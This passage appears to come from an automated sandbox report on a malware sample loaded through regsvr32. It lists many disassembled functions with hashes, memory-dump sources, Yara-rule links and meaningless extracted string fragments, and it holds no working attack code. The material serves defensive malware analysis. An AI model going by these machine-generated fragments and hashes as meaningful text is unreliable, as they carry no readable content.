                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AEB12570D207499FDB88DFA9D8898DDBBF1FB48304F40921DE816AB250C778A945CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259610C Relevance: 6.5, Strings: 5, Instructions: 208COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: cp$vm$x$zu$Kn#
                                                                                                                                                                                                                    • API String ID: 0-3521309225
                                                                                                                                                                                                                    • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                                                                                                                                    • Instruction ID: b73d6d5bba221db4e085a60b930951a1be0906b4c8b304391b533ee31e73e750
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DCA1F2B0D143198BDF48CFA9D8898DEBBF1FB48318F108219E855B7290D3789949CF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02597518 Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                                                                                                                                                    • API String ID: 0-817034907
                                                                                                                                                                                                                    • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                                                                                                                                    • Instruction ID: 2210052d66244a3137c2fae1ff82b0a2a1c031a9fea9962b7a56a18e5c28d890
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB4192B180034E8FDB44DF64D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258975C Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ,$3T$D-$Rc$l
                                                                                                                                                                                                                    • API String ID: 0-617906138
                                                                                                                                                                                                                    • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                                                                                                                                    • Instruction ID: 42e9e9a09ba6ce421a5b368c7ae49e06ebda5fae561dddf0b9f5560dba656206
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F441D5B081078E8FDB44CF64D88A4CE7BF0FB58358F104619E869A6260D3B89664CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0000000180001D98 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                    			E00000001180001D98(long long __rbx, long long _a32) {

				_a32 = __rbx;
			}



                                                                                                                                                                                                                    0x180001d98

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315466083.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315457526.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315482753.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315498265.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 0000000C.00000002.315506082.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                    • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                                                                                                                                    • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259CF70 Relevance: 5.4, Strings: 4, Instructions: 410COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$ $UCV$y4.)
                                                                                                                                                                                                                    • API String ID: 0-917551206
                                                                                                                                                                                                                    • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                                                                                                                                    • Instruction ID: df2e1ab8fa764aea3db0f19738312282430a4918aa2dbf6288d93fdc4609bc41
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B12E5B1A047099FDF58DFA8D08A5DDBBF2FB48348F00412EE946A7290D7B5D809CB59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02584EB8 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$rq%$tL>$".
                                                                                                                                                                                                                    • API String ID: 0-3922733902
                                                                                                                                                                                                                    • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                                                                                                                                    • Instruction ID: 8ba53ef11ca7c3e98439d23673cd1d2afa0d725c36c2aca25029f137fb6cd7ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4622D1719096C88BDBF8DF24C8896CD3BF0FF48344F90115AD84EAA654DBB86684CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259AD28 Relevance: 5.2, Strings: 4, Instructions: 205COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: g$-$HE$Vc
                                                                                                                                                                                                                    • API String ID: 0-2562162751
                                                                                                                                                                                                                    • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                                                                                                                                    • Instruction ID: 22c36e927fe4ea52a899319f486a89e909310cd566158b4527116cd8bf524d7b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34A1C1B150478D9FDB84CF28D8894CD3BB2FB583A8F505219F84A97260D7B8D985CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025880CC Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: (;$*i$he$*%
                                                                                                                                                                                                                    • API String ID: 0-35414758
                                                                                                                                                                                                                    • Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                                                                                                                                    • Instruction ID: 546f1731ab826c49fa506a24d358db3743f0fe0338ed58007c78efb41e69c60b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E171147051424DDBDF48DF28C88A5DD3FA1FB48368F965319FC4AA6290C7B8D484CB89
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258D474 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: */$I$Yu$(
                                                                                                                                                                                                                    • API String ID: 0-674225443
                                                                                                                                                                                                                    • Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                                                                                                                                    • Instruction ID: bc8bd9af87dc6821c979dddd23cce03d3ce7e218f1369a9bb3e6d4baf1fdb430
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5719DB180030ACFDB58CF68D48A5DE7FB0FB68398F204219E85596260D7B49AA5CFC4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025814D4 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #X$.:$PYq|$W
                                                                                                                                                                                                                    • API String ID: 0-626586655
                                                                                                                                                                                                                    • Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                                                                                                                                    • Instruction ID: df080c1d1520df2bd25ade6797ed34cf7a90b02fddf837033b8596a122da19fa
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7241037061CB858FD7A8DF28C58AA5BBBF1FBD9704F804A1EE589C7250DB749804CB42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258A660 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 5`$<ml$a:$P
                                                                                                                                                                                                                    • API String ID: 0-330785107
                                                                                                                                                                                                                    • Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                                                                                                                                    • Instruction ID: 71cec3b6b902d94d26853337a6ec5491ef96a5196bf9381f3904f8dacf37277d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B41F4B190074E8BDB48DF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02594A90 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -+$0u$S$e!
                                                                                                                                                                                                                    • API String ID: 0-4217091389
                                                                                                                                                                                                                    • Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                                                                                                                                    • Instruction ID: d5eac31e574bfebf339735ab3dbbd8b94680f1da84b413ce821066fddd95483a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F141E3B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02583274 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: o$"B$SJ$wU
                                                                                                                                                                                                                    • API String ID: 0-691100934
                                                                                                                                                                                                                    • Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                                                                                                                                    • Instruction ID: 28230e0568973329e75fc06b2d643f2681fe5095759b04cf82198f648ae9b649
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6941DFB180078E8FDB48CF68C88A5DEBBF0FB58358F104619E859A6254D3B89695CFC5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02581B94 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 9luJ$=2y}$=2y}$b
                                                                                                                                                                                                                    • API String ID: 0-1667874806
                                                                                                                                                                                                                    • Opcode ID: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                                                                                                                                    • Instruction ID: 315f52423604339c16e1cd469138515757e2b711977218ad7dd3c8d770368d64
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d458d9c607de17fbdbefdb2618156754051a2d24e7c6e7f69b2615133eee77d7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2941D6B181038EDFDF44CF64D88A4CE7BB0FB18358F110A19E865A62A4D3B89665CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 025848FC Relevance: 4.0, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ;$O,$fdu
                                                                                                                                                                                                                    • API String ID: 0-1721916326
                                                                                                                                                                                                                    • Opcode ID: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                                                                                                                                    • Instruction ID: 24fb4c48e5c09c20ef14a52b1ca5e8dcc8251519471bde5f7b200914a4d1d897
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85396711fe01e2282415cffc97d2cae76b85543eafba1fee15bed9e01615747c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BA10370D14718EBDF58DFA8E8C999DBBB1FB54318F00421EE806AB2A0CBB49945CF45
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02583E0C Relevance: 3.9, Strings: 3, Instructions: 171COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: u$&v$f
                                                                                                                                                                                                                    • API String ID: 0-1868853588
                                                                                                                                                                                                                    • Opcode ID: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                                                                                                                                    • Instruction ID: 3df84bf16934138bd641e57391c501ac831f2a18cf494e93411e023fb28d808b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0e0bcf9159e8ed5db1efbd4fd836488bb382803c7d1313d4c59486869e04d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E714371D04709ABCF1CDFA8E5C91AEBBB1FB48314F10812DE816A72A0CB749945CF85
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259E750 Relevance: 3.9, Strings: 3, Instructions: 145COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: o$j$t
                                                                                                                                                                                                                    • API String ID: 0-2067604139
                                                                                                                                                                                                                    • Opcode ID: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                                                                                                                                    • Instruction ID: c572a0d0d99c9a2ef78c3c387629943dd4cba6cb9054a45173da8e9c14cb6cd5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 113b91994dddf0efa674f36996042e856a8803c02bc6c37f7aa57fbd8228378e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4661E0705087858BD768DF28C19A55FBBF1FBC6704F104A1EE68A9B2A0D77AD844CB43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 02598BB8 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: =$N@`Y$`Y
                                                                                                                                                                                                                    • API String ID: 0-2183226064
                                                                                                                                                                                                                    • Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                                                                                                                                    • Instruction ID: 80d927c14451896fa1034a719b886fc41b06c5e6af56a2158700907cfc61367f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F51D3B190074E8FDB44DF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259D5F0 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: P$KGRa$wy
                                                                                                                                                                                                                    • API String ID: 0-4077564265
                                                                                                                                                                                                                    • Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                                                                                                                                    • Instruction ID: 5b9f8e79a60886437af7d56b505d3fe5b87aa2ce3c6827267c5179b2650fd618
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0941C0B090074A8BDF48DF68C8865DE7FB0FB68348F51461DE84AA6290D37896A4CFC4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0259EAC0 Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000C.00000002.315246510.0000000002581000.00000020.00001000.00020000.00000000.sdmp, Offset: 02581000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_2581000_regsvr32.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: '0$~?$\
                                                                                                                                                                                                                    • API String ID: 0-629757258
                                                                                                                                                                                                                    • Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                                                                                                                                    • Instruction ID: e0f53bf650af16e908953c2fd5c611e0b361f9c72ccb540305d3c6614b1aa883
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3741CEB0548B818BE718DF28C59A51ABBF1FBC5344F604A2DF6968A3A0D774D885CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0258DCB8 Relevance: 3.8, Strings: 3, Instructions: 80COMMON
